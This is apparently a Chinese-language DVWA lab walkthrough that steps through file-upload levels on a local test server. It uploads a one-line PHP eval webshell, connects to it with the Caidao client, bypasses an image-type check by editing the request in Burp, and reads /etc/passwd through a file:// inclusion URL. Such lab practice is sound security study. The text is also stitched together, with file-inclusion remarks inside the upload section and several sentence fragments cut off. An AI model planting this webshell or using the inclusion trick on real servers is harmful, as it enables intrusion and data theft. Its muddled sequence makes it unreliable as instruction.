- List item
Low
沒有進(jìn)行任何過濾

首相,上傳一個(gè)phpinfo.php,其內(nèi)代碼如下:
<?php phpinfo(); ?>
上傳路徑:http://127.0.0.1/DVWA-1.9/hackable/uploads/phpinfo.php
然后訪問
首先,寫好
說(shuō)明存在上傳和執(zhí)行漏洞
上傳一句話木馬:
<?php @eval($_POST[“hack”]); ?>
保存為hack.php
然后上傳
找到文件上傳目錄
http://127.0.0.1/DVWA-1.9/hackable/uploads/hack.php
可以直接用hackbar這個(gè)插件,上傳命令,爆出信息
使用菜刀連接
成功
Medium
有過濾

使用str_replace函數(shù)是極其不安全的,因?yàn)榭梢允褂秒p寫繞過替換規(guī)則。
同時(shí),因?yàn)樘鎿Q的只是“../”、“..\”,所以對(duì)采用絕對(duì)路徑的方式包含文件是不會(huì)受到任何限制的。
可以先在上傳一個(gè)
此題要求,需要上傳 .png或 .jpeg格式文件
因此,我們想到可以更改文件類型,然后上傳
直接hack.php擴(kuò)展名改為hack.png,然后上傳,
可以上傳成功,
使用菜刀連接
連接不上
制作圖片碼上傳,同樣如此
那么,可以使用burp抓包修改文件類型看看
成功
High
其過濾內(nèi)容為
這個(gè)if語(yǔ)句的意思是如果page中不含有file并且page不等于include.php服務(wù)器才不會(huì)去包含相應(yīng)的文件。兩個(gè)條件只要不滿足其中之一就可以,要么page等于include.php,要么page含有file。用file://流訪問本地文件系統(tǒng)
http://127.0.0.1/DVWA-1.9/vulnerabilities/fi/?page=file:///etc/passwd
說(shuō)明存在命令執(zhí)行
上菜刀,結(jié)果發(fā)現(xiàn)無(wú)聊是如何,jar版本的死活連不上,使用windows .exe版本的可以,我也懵逼